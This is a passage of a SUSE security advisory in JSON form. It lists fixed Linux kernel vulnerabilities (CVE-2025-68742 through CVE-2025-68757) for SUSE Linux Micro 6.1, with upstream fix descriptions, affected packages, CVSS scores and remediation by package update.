"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68742"
},
{
"cve": "CVE-2025-68744",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68744"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Free special fields when update [lru_,]percpu_hash maps\n\nAs [lru_,]percpu_hash maps support BPF_KPTR_{REF,PERCPU}, missing\ncalls to \u0027bpf_obj_free_fields()\u0027 in \u0027pcpu_copy_value()\u0027 could cause the\nmemory referenced by BPF_KPTR_{REF,PERCPU} fields to be held until the\nmap gets freed.\n\nFix this by calling \u0027bpf_obj_free_fields()\u0027 after\n\u0027copy_map_value[,_long]()\u0027 in \u0027pcpu_copy_value()\u0027.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68744",
"url": "https://www.suse.com/security/cve/CVE-2025-68744"
},
{
"category": "external",
"summary": "SUSE Bug 1255709 for CVE-2025-68744",
"url": "https://bugzilla.suse.com/1255709"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68744"
},
{
"cve": "CVE-2025-68746",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68746"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nspi: tegra210-quad: Fix timeout handling\n\nWhen the CPU that the QSPI interrupt handler runs on (typically CPU 0)\nis excessively busy, it can lead to rare cases of the IRQ thread not\nrunning before the transfer timeout is reached.\n\nWhile handling the timeouts, any pending transfers are cleaned up and\nthe message that they correspond to is marked as failed, which leaves\nthe curr_xfer field pointing at stale memory.\n\nTo avoid this, clear curr_xfer to NULL upon timeout and check for this\ncondition when the IRQ thread is finally run.\n\nWhile at it, also make sure to clear interrupts on failure so that new\ninterrupts can be run.\n\nA better, more involved, fix would move the interrupt clearing into a\nhard IRQ handler. Ideally we would also want to signal that the IRQ\nthread no longer needs to be run after the timeout is hit to avoid the\nextra check for a valid transfer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68746",
"url": "https://www.suse.com/security/cve/CVE-2025-68746"
},
{
"category": "external",
"summary": "SUSE Bug 1255722 for CVE-2025-68746",
"url": "https://bugzilla.suse.com/1255722"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68746"
},
{
"cve": "CVE-2025-68750",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68750"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: potential integer overflow in usbg_make_tpg()\n\nThe variable tpgt in usbg_make_tpg() is defined as unsigned long and is\nassigned to tpgt-\u003etport_tpgt, which is defined as u16. This may cause an\ninteger overflow when tpgt is greater than USHRT_MAX (65535). I\nhaven\u0027t tried to trigger it myself, but it is possible to trigger it\nby calling usbg_make_tpg() with a large value for tpgt.\n\nI modified the type of tpgt to match tpgt-\u003etport_tpgt and adjusted the\nrelevant code accordingly.\n\nThis patch is similar to commit 59c816c1f24d (\"vhost/scsi: potential\nmemory corruption\").",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68750",
"url": "https://www.suse.com/security/cve/CVE-2025-68750"
},
{
"category": "external",
"summary": "SUSE Bug 1255814 for CVE-2025-68750",
"url": "https://bugzilla.suse.com/1255814"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68750"
},
{
"cve": "CVE-2025-68753",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68753"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: firewire-motu: add bounds check in put_user loop for DSP events\n\nIn the DSP event handling code, a put_user() loop copies event data.\nWhen the user buffer size is not aligned to 4 bytes, it could overwrite\nbeyond the buffer boundary.\n\nFix by adding a bounds check before put_user().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68753",
"url": "https://www.suse.com/security/cve/CVE-2025-68753"
},
{
"category": "external",
"summary": "SUSE Bug 1256238 for CVE-2025-68753",
"url": "https://bugzilla.suse.com/1256238"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68753"
},
{
"cve": "CVE-2025-68757",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68757"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/vgem-fence: Fix potential deadlock on release\n\nA timer that expires a vgem fence automatically in 10 seconds is now\nreleased with timer_delete_sync() from fence-\u003eops.release() called on last\ndma_fence_put(). In some scenarios, it can run in IRQ context, which is\nnot safe unless TIMER_IRQSAFE is used. One potentially risky scenario was\ndemonstrated in Intel DRM CI trybot, BAT run on machine bat-adlp-6, while\nworking on new IGT subtests syncobj_timeline@stress-* as user space\nreplacements of some problematic test cases of a dma-fence-chain selftest\n[1].\n\n[117.004338] ================================\n[117.004340] WARNING: inconsistent lock state\n[117.004342] 6.17.0-rc7-CI_DRM_17270-g7644974e648c+ #1 Tainted: G S U\n[117.004346] --------------------------------\n[117.004347] inconsistent {HARDIRQ-ON-W} -\u003e {IN-HARDIRQ-W} usage.\n[117.004349] swapper/0/0 [HC1[1]:SC1[1]:HE0:SE0] takes:\n[117.004352] ffff888138f86aa8 ((\u0026fence-\u003etimer)){?.-.}-{0:0}, at: __timer_delete_sync+0x4b/0x190\n[117.004361] {HARDIRQ-ON-W} state was registered at:\n[117.004363] lock_acquire+0xc4/0x2e0\n[117.004366] call_timer_fn+0x80/0x2a0\n[117.004368] __run_timers+0x231/0x310\n[117.004370] run_timer_softirq+0x76/0xe0\n[117.004372] handle_softirqs+0xd4/0x4d0\n[117.004375] __irq_exit_rcu+0x13f/0x160\n[117.004377] irq_exit_rcu+0xe/0x20\n[117.004379] sysvec_apic_timer_interrupt+0xa0/0xc0\n[117.004382] asm_sysvec_apic_timer_interrupt+0x1b/0x20\n[117.004385] cpuidle_enter_state+0x12b/0x8a0\n[117.004388] cpuidle_enter+0x2e/0x50\n[117.004393] call_cpuidle+0x22/0x60\n[117.004395] do_idle+0x1fd/0x260\n[117.004398] cpu_startup_entry+0x29/0x30\n[117.004401] start_secondary+0x12d/0x160\n[117.004404] common_startup_64+0x13e/0x141\n[117.004407] irq event stamp: 2282669\n[117.004409] hardirqs last enabled at (2282668): [\u003cffffffff8289db71\u003e] _raw_spin_unlock_irqrestore+0x51/0x80\n[117.004414] hardirqs last disabled at (2282669): [\u003cffffffff82882021\u003e] sysvec_irq_work+0x11/0xc0\n[117.004419] softirqs last enabled at (2254702): [\u003cffffffff8289fd00\u003e] __do_softirq+0x10/0x18\n[117.004423] softirqs last disabled at (2254725): [\u003cffffffff813d4ddf\u003e] __irq_exit_rcu+0x13f/0x160\n[117.004426]\nother info that might help us debug this:\n[117.004429] Possible unsafe locking scenario:\n[117.004432] CPU0\n[117.004433] ----\n[117.004434] lock((\u0026fence-\u003etimer));\n[117.004436] \u003cInterrupt\u003e\n[117.004438] lock((\u0026fence-\u003etimer));\n[117.004440]\n *** DEADLOCK ***\n[117.004443] 1 lock held by swapper/0/0:\n[117.004445] #0: ffffc90000003d50 ((\u0026fence-\u003etimer)){?.-.}-{0:0}, at: call_timer_fn+0x7a/0x2a0\n[117.004450]\nstack backtrace:\n[117.004453] CPU: 0 UID: 0 PID: 0 Comm: swapper/0 Tainted: G S U 6.17.0-rc7-CI_DRM_17270-g7644974e648c+ #1 PREEMPT(voluntary)\n[117.004455] Tainted: [S]=CPU_OUT_OF_SPEC, [U]=USER\n[117.004455] Hardware name: Intel Corporation Alder Lake Client Platform/AlderLake-P DDR4 RVP, BIOS RPLPFWI1.R00.4035.A00.2301200723 01/20/2023\n[117.004456] Call Trace:\n[117.004456] \u003cIRQ\u003e\n[117.004457] dump_stack_lvl+0x91/0xf0\n[117.004460] dump_stack+0x10/0x20\n[117.004461] print_usage_bug.part.0+0x260/0x360\n[117.004463] mark_lock+0x76e/0x9c0\n[117.004465] ? register_lock_class+0x48/0x4a0\n[117.004467] __lock_acquire+0xbc3/0x2860\n[117.004469] lock_acquire+0xc4/0x2e0\n[117.004470] ? __timer_delete_sync+0x4b/0x190\n[117.004472] ? __timer_delete_sync+0x4b/0x190\n[117.004473] __timer_delete_sync+0x68/0x190\n[117.004474] ? __timer_delete_sync+0x4b/0x190\n[117.004475] timer_delete_sync+0x10/0x20\n[117.004476] vgem_fence_release+0x19/0x30 [vgem]\n[117.004478] dma_fence_release+0xc1/0x3b0\n[117.004480] ? dma_fence_release+0xa1/0x3b0\n[117.004481] dma_fence_chain_release+0xe7/0x130\n[117.004483] dma_fence_release+0xc1/0x3b0\n[117.004484] ? _raw_spin_unlock_irqrestore+0x27/0x80\n[117.004485] dma_fence_chain_irq_work+0x59/0x80\n[117.004487] irq_work_single+0x75/0xa0\n[117.004490] irq_work_r\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
